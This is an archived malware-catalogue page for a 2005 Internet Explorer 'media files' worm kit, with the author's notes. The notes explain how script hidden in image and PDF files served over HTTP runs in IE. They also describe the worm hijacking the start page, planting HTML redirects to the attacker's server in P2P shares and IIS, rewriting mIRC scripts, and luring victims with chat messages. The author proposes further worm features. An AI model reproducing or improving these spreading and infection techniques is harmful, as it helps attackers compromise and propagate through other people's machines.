.: IE Media Files worm kit :.
Released 16 years, 8 months ago. Dec 2005
By dav::actions
Additional Details
- Coded by: dav
- Version: IE Media Files worm kit
- Released date: Dec 2005, 16 years, 8 months ago.
- Coded in: Delphi
- Family: IE Media Files worm kit
- Category: Remote Access
MegaSecurity Notes
tested on Windows XP February 17, 2007
Author Words
Intro Sven Vetsch found a cross site scripting vulnerability at Microsoft Internet Explorer. Its possible to run arbitrary script code. The problem lies in the handling of the content of such files. In the first place the usual file header (e.g. Gif) is provided. The remaining content of the file could be usual html data -> + javascript/visual basic script (VBS, ActiveX must be enabled!) Worm Description My w0rm defines a new IE start page. If the victim starts IE, IE will always load the w0rm.gif (on my webserver) -> w0rm start routine! Unfortunately the gif bug only works when IE streams the gif from a web server over HTTP or HTTPS! The malicious gif can't be executed locally or included in other html pages. Therefore i had to write a new spreading technique. It makes no sense to drop a copy of the w0rm. So I decided that my w0rm creates html files on the victim machine with one meta tag line -> w.WriteLine "<meta http-equiv='refresh' content='0;URL=" & url & "'>" The idea is simple. Drop html files including redirection to our webserver and spread these html files over file sharing folders (kazaa, p2p) and IIS (if installed). Also my w0rm overwrites (if exist) the mirc script.ini with some new lines. Why no dcc spreading script? Simply because the chance is much higher that the w0rm infects more machines by sending the link across irc instead of sending html files. Malicious JPG, PDF, PNG, AVI, ... Its possible to put/hide your w0rm in every file (jpg, gif, pdf, png, avi,...). I tried it and it works! (all IE) Open your notepad and type: <script type="text/javascript">alert("the vx scene never dies!")</script> Save it as *.jpg, *.pdf, ... ;) It isn't necessary to write the usual file header (e.g. Gif) in the first place! Just put your js/vbs c0de in such a file, upload and... :). New Idea I guess you noticed that my sample script is not exactly a real w0rm but, we could write a w0rm with the following features: - the w0rm drops a copy of itself as jpg, gif, pdf, png, avi, ... and a binary version of a simple webserver in itself (with chr()) - spreading the hosts ip over mail?/irc/im? -> e.g. "hey buddy look at this :D, --/URL REDACTED BY SUB7CREW.ORG FOR YOUR SAFETY\--" dav
URL's and mails were automatically redacted (filtered) for reader's safety. However the filter is not perfect and can't find all harmful elements. If you find something dangerous including file link, website, mail address, profanity... contact me immediately at sub7crew@protonmail.com, thank you in advance.